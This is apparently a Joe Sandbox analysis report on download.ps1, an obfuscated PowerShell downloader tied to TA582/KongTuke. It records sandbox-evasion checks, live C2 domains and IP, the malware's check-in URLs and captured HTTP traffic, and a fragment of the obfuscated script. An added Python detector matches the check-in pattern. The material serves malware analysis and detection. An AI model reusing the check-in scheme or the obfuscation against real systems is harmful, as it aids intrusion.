Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3265000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3265000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware`S
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3265000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000000.00000002.2217128894.00000111E2865000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3265000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3265000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.2217128894.00000111E2865000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3265000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.2267521502.00000111FA369000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
MITRE ATT&CK Matrix (one line per tactic; bracketed numbers are the counters attached to those cells in the report's matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation [2]; PowerShell [1]; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection [1]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion [121]; Process Injection [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]; Software Packing; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery [21]; Process Discovery [1]; Virtualization/Sandbox Evasion [121]; Application Window Discovery [1]; File and Directory Discovery [2]; System Information Discovery [11]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Antivirus detection (submitted file)

Source | Detection | Scanner | Label
download.ps1 | 11% | Virustotal |
download.ps1 | 16% | ReversingLabs | Script-PowerShell.Trojan.Kongtuke

No Antivirus matches
Antivirus detection (URLs)

Source | Detection | Scanner | Label
http://$tcbm1lixhefpkn0/$9rkis8hejvfl3c4.php?id=$env:computername&key=$bhwpnfx&s=527 | 0% | Avira URL Cloud | safe
http://crl.mf- | 0% | Avira URL Cloud | safe
http://gajaechkfhfghal.top | 100% | Avira URL Cloud | malware
http://gajaechkfhfghal.top/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527 | 100% | Avira URL Cloud | malware
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 142.250.181.68 | true | false | | high
gajaechkfhfghal.top | 45.61.136.138 | true | false | | high
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://gajaechkfhfghal.top/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527 | true | Avira URL Cloud: malware | unknown
http://www.google.com/ | false | | high
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
45.61.136.138 | gajaechkfhfghal.top | United States | 40676 | AS40676 (US) | false
142.250.181.68 | www.google.com | United States | 15169 | GOOGLE (US) | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580819
Start date and time: 2024-12-26 10:01:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: download.ps1
Detection: MAL
Classification: mal84.evad.winPS1@2/7@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 18
• Number of non-executed functions: 12
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 172.202.163.200
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 6672 because it is empty
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:01:55 | API Interceptor | 41x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
45.61.136.138 | download.ps1 | malicious | Unknown | gajaechkfhfghal.top/wzlym6vt7ahtr.php?id=computer&key=78042689494&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | gajaechkfhfghal.top/roqyfncdwahtr.php?id=user-PC&key=81114521757&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | gajaechkfhfghal.top/g458bzp6m1htr.php?id=computer&key=56848542613&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | gajaechkfhfghal.top/jzik4w36vshtr.php?id=user-PC&key=35005560655&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | gajaechkfhfghal.top/hxe035pvfthtr.php?id=computer&key=72113948934&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | gajaechkfhfghal.top/aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | gajaechkfhfghal.top/q9lpw6berahtr.php?id=user-PC&key=70313677457&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527
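The ten check-in URLs above share one shape: a ten-character lowercase alphanumeric label followed by `htr.php`, with exactly the query parameters `id` (the victim host name), `key` (a numeric value) and `s` (527 on every row). The Python below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it turns that observed shape into a matcher, pairs it with the domain and IP indicators from this report's context tables, and runs it over a few constructed proxy log lines. The log format, the client addresses, the `example.invalid` host and the fourth log line's `s=528` value are all made up for the demonstration.

```python
"""Matcher for the TA582 / KongTuke check-in URLs listed in this report.

Added example, not part of the Joe Sandbox report.  The URL shape comes from
the ten check-in URLs in the IP-context table; the proxy log is constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Every check-in URL on this page has the form
#   <domain>/<10 lowercase alnum chars>htr.php?id=<hostname>&key=<digits>&s=<digits>
# The prefix, hostname and key vary per run; "htr.php" and the parameter set
# are the stable part.  s=527 on every row here, but it is matched as a digit
# field so a build that changes it is still caught.
CHECKIN_PATH = re.compile(r"^/[a-z0-9]{10}htr\.php$")
REQUIRED_PARAMS = {"id", "key", "s"}

# Network IOCs copied from the context tables of this report.
KNOWN_DOMAINS = {"gajaechkfhfghal.top", "cmacnnkfbhlcncm.top"}
KNOWN_IPS = {"45.61.136.138"}

# The check-in URLs exactly as listed on this page.
PAGE_URLS = [
    "gajaechkfhfghal.top/wzlym6vt7ahtr.php?id=computer&key=78042689494&s=527",
    "gajaechkfhfghal.top/roqyfncdwahtr.php?id=user-PC&key=81114521757&s=527",
    "gajaechkfhfghal.top/g458bzp6m1htr.php?id=computer&key=56848542613&s=527",
    "gajaechkfhfghal.top/jzik4w36vshtr.php?id=user-PC&key=35005560655&s=527",
    "gajaechkfhfghal.top/hxe035pvfthtr.php?id=computer&key=72113948934&s=527",
    "gajaechkfhfghal.top/aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527",
    "gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527",
    "gajaechkfhfghal.top/q9lpw6berahtr.php?id=user-PC&key=70313677457&s=527",
    "cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527",
    "cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527",
]


def _split(url: str):
    """urlsplit that tolerates the scheme-less form used in the report tables."""
    if "://" not in url:
        url = "http://" + url
    return urlsplit(url)


def is_checkin_url(url: str) -> bool:
    """True if url has the TA582 check-in shape, whatever the domain."""
    parts = _split(url)
    if not CHECKIN_PATH.match(parts.path):
        return False
    query = parse_qs(parts.query, keep_blank_values=True)
    if set(query) != REQUIRED_PARAMS:      # exactly id, key and s, nothing else
        return False
    host_id, key, s = query["id"][0], query["key"][0], query["s"][0]
    return bool(host_id) and key.isdigit() and s.isdigit()


def verdict(url: str):
    """'known_ioc' (host listed on this page), 'pattern' (shape only) or None."""
    if not is_checkin_url(url):
        return None
    host = _split(url).hostname or ""
    return "known_ioc" if host in KNOWN_DOMAINS or host in KNOWN_IPS else "pattern"


# Constructed proxy log (not from the report): time, client, method, URL, status.
SAMPLE_LOG = """\
2024-12-26T10:02:00Z 10.0.0.21 GET http://gajaechkfhfghal.top/wzlym6vt7ahtr.php?id=computer&key=78042689494&s=527 200
2024-12-26T10:02:02Z 10.0.0.21 GET http://www.google.com/ 200
2024-12-26T10:05:11Z 10.0.0.37 GET http://cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527 200
2024-12-26T10:07:40Z 10.0.0.44 GET http://example.invalid/qp3x9mc2lthtr.php?id=LAPTOP-7&key=40012345678&s=528 404
2024-12-26T10:09:03Z 10.0.0.44 GET http://example.invalid/search.php?id=5&key=abc 200
"""


def scan(lines):
    """Return one record per log line whose URL has the check-in shape."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        stamp, client, _method, url, _status = fields[:5]
        v = verdict(url)
        if v is None:
            continue
        hits.append({"time": stamp, "client": client,
                     "host": _split(url).hostname, "url": url, "verdict": v})
    return hits


if __name__ == "__main__":
    assert all(is_checkin_url(u) for u in PAGE_URLS)
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit["verdict"], hit["client"], hit["host"], hit["url"])
```

The shape match is deliberately kept separate from the indicator match: the two domains and the IP on this page will rotate, while the `htr.php` path and the `id`/`key`/`s` parameter set are what the beacon logic itself produces, so a `pattern` hit on an unknown host is the more durable signal and worth triaging as a possible new C2 domain.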
Match | Associated Sample Name / URL | Detection | Threat Name | Context
gajaechkfhfghal.top | download.ps1 | malicious | Unknown | 45.61.136.138
gajaechkfhfghal.top | download.ps1 | malicious | Unknown | 45.61.136.138
gajaechkfhfghal.top | download.ps1 | malicious | Unknown | 45.61.136.138
gajaechkfhfghal.top | download.ps1 | malicious | Unknown | 45.61.136.138
gajaechkfhfghal.top | download.ps1 | malicious | Unknown | 45.61.136.138
gajaechkfhfghal.top | download.ps1 | malicious | Unknown | 45.61.136.138
gajaechkfhfghal.top | download.ps1 | malicious | Unknown | 45.61.136.138
gajaechkfhfghal.top | download.ps1 | malicious | Unknown | 45.61.136.138
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS40676 (US) | telnet.ppc.elf | malicious | Unknown | 45.34.255.95
AS40676 (US) | armv6l.elf | malicious | Mirai | 45.34.153.95
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
AS40676 (US) | download.ps1 | malicious | Unknown | 45.61.136.138
No context
No context
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1628158735648508
Encrypted:false
SSDEEP:3:NlllulFgtj:NllUa
MD5:E986DDCA20E18C878305AA21342325F6
SHA1:AE6890EE7BB81A051A4F4079F549DEBCCE0F82C9
SHA-256:9624DAA47DF80C2229877179550D8373CAEEEAE25A8123698D7A516AD455DD15
SHA-512:8B0CD5C1F0BAECA299669D6A0CB74F9315E90B05EDEA16C92B92D9927D3D07225AC5DAE9941CF339E1CED349BA8129F56F118CF89AB86CF8DAAAFFDB8EC8B56D
Malicious:false
Reputation:moderate, very likely benign file
Preview:@...e................................................@..........

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:high, very likely benign file
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:high, very likely benign file
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:high, very likely benign file
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

The four identical 60-byte files above are the probe scripts that PowerShell itself writes to the user's temp directory on start-up to check whether AppLocker is enforcing lockdown mode; they are a host artifact of running powershell.exe, not a payload dropped by the sample, which is consistent with the benign reputation shown.

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6224
Entropy (8bit):3.7259464046144544
Encrypted:false
SSDEEP:48:rkD9l8tq6mx63CyMlU2UpzukvhkvklCywpBZ/iilHJnSogZo1hZ/iilHfnSogZoH:MUp3CoTUkvhkvCCtX9iieHE9iilKHO
MD5:8A1B648C59102212C578F26801F73DBD
SHA1:11B6C74D0194A82FD9401A86A456C8F06F06B4B5
SHA-256:7E80E5A2C44DF5C044CFDBEF6A86DC9E4865D70542B48E0EB45B93D591321654
SHA-512:75E7853EFC522C18D656A2FD25080E442D87C814C72AA638AE068B060641F29C75D307CE1189DDE69958B950C5D6A7B2E7DDB6FBD1DF64BC94312773A4F687BC
Malicious:false
Preview:...................................FL..................F.".. ...J.S...Y...tW..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....v..tW......tW......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y:H...........................^.A.p.p.D.a.t.a...B.V.1......Y8H..Roaming.@......EW<2.Y8H..../......................H..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y5H....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y5H....2......................1..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y5H....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y5H....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y;H....u...........

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6224
Entropy (8bit):3.7259464046144544
Encrypted:false
SSDEEP:48:rkD9l8tq6mx63CyMlU2UpzukvhkvklCywpBZ/iilHJnSogZo1hZ/iilHfnSogZoH:MUp3CoTUkvhkvCCtX9iieHE9iilKHO
MD5:8A1B648C59102212C578F26801F73DBD
SHA1:11B6C74D0194A82FD9401A86A456C8F06F06B4B5
SHA-256:7E80E5A2C44DF5C044CFDBEF6A86DC9E4865D70542B48E0EB45B93D591321654
SHA-512:75E7853EFC522C18D656A2FD25080E442D87C814C72AA638AE068B060641F29C75D307CE1189DDE69958B950C5D6A7B2E7DDB6FBD1DF64BC94312773A4F687BC
Malicious:false
Preview:...................................FL..................F.".. ...J.S...Y...tW..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....v..tW......tW......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y:H...........................^.A.p.p.D.a.t.a...B.V.1......Y8H..Roaming.@......EW<2.Y8H..../......................H..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y5H....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y5H....2......................1..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y5H....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y5H....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y;H....u...........
File type:ASCII text, with very long lines (11443), with CRLF line terminators
Entropy (8bit):5.992473390940018
TrID:
File name:download.ps1
File size:20'721 bytes
MD5:8d7677123f246bb6bfaf3e54501aa93d
SHA1:a2087790c0105e329964e38e776da360ce38fc3e
SHA256:ff7bc609b58de655c7e0b5ffb9c4a7adce64a8cf24bb131573b1def9ca66db84
SHA512:ef768006e6ba6b6dc90c1ba8703145b373b4721793d7f7812afc5a26ff051bfb1eb4a66fd9a364352bab4c5f1a33ffee5c6ee90c09c2eb6b6ff8e02fda4f3249
SSDEEP:384:5Fvv1wGq6Bel+IwN07V9dKGk9rIBu2vMh1lAN+ChXwT07h1O5QZMIqc:5Fv1fbIVJ9HZBzMh1uoCOch1IQZN
TLSH:F0927D94BB8DE8E2D6ECDB2FB6033C147751716B90EA69C4F6DCD1C523A03456E89C82
File Content Preview:$sfaogbmuirt=$executioncontext;$alisinonenanediseranedalenesed = (-jOIn (@((470375/(3758+5117)),(8486-(12037-(36134487/(12224-(5180-(15510060/(34278012/6597))))))),(133551/(2613-270)),(-3343+(13306-9913)),(334-278),(-4230+(3904+380)),(271096/4841),(2043-(
Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-26T10:01:58.643168+0100 | 2859405 | ETPRO MALWARE TA582 Domain in DNS Lookup | 1 | 192.168.2.6 | 51603 | 1.1.1.1 | 53 | UDP
2024-12-26T10:02:00.603527+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 1 | 192.168.2.6 | 49699 | 45.61.136.138 | 80 | TCP
2024-12-26T10:02:00.603527+0100 | 2057741 | ET MALWARE TA582 CnC Checkin | 1 | 192.168.2.6 | 49699 | 45.61.136.138 | 80 | TCP
2024-12-26T10:02:02.718194+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 1 | 192.168.2.6 | 49700 | 142.250.181.68 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 10:01:58.643167973 CET | 51603 | 53 | 192.168.2.6 | 1.1.1.1
Dec 26, 2024 10:01:59.048149109 CET | 53 | 51603 | 1.1.1.1 | 192.168.2.6
Dec 26, 2024 10:02:00.552156925 CET | 61901 | 53 | 192.168.2.6 | 1.1.1.1
Dec 26, 2024 10:02:00.690301895 CET | 53 | 61901 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 26, 2024 10:01:58.643167973 CET | 192.168.2.6 | 1.1.1.1 | 0xf5cb | Standard query (0) | gajaechkfhfghal.top | A (IP address) | IN (0x0001) | false
Dec 26, 2024 10:02:00.552156925 CET | 192.168.2.6 | 1.1.1.1 | 0xdd1a | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 26, 2024 10:01:59.048149109 CET | 1.1.1.1 | 192.168.2.6 | 0xf5cb | No error (0) | gajaechkfhfghal.top | | 45.61.136.138 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 10:02:00.690301895 CET | 1.1.1.1 | 192.168.2.6 | 0xdd1a | No error (0) | www.google.com | | 142.250.181.68 | A (IP address) | IN (0x0001) | false
• gajaechkfhfghal.top
• www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49699 | 45.61.136.138 | 80 | 6672 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 10:01:59.182908058 CET | 219 | OUT | GET /w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: gajaechkfhfghal.top
Connection: Keep-Alive
Dec 26, 2024 10:02:00.550543070 CET | 166 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 26 Dec 2024 09:02:00 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49700 | 142.250.181.68 | 80 | 6672 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 10:02:00.843393087 CET | 159 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.google.com
Connection: Keep-Alive
Dec 26, 2024 10:02:02.718004942 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 09:02:02 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-7w6CO02cEtStPa5V75PqCQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
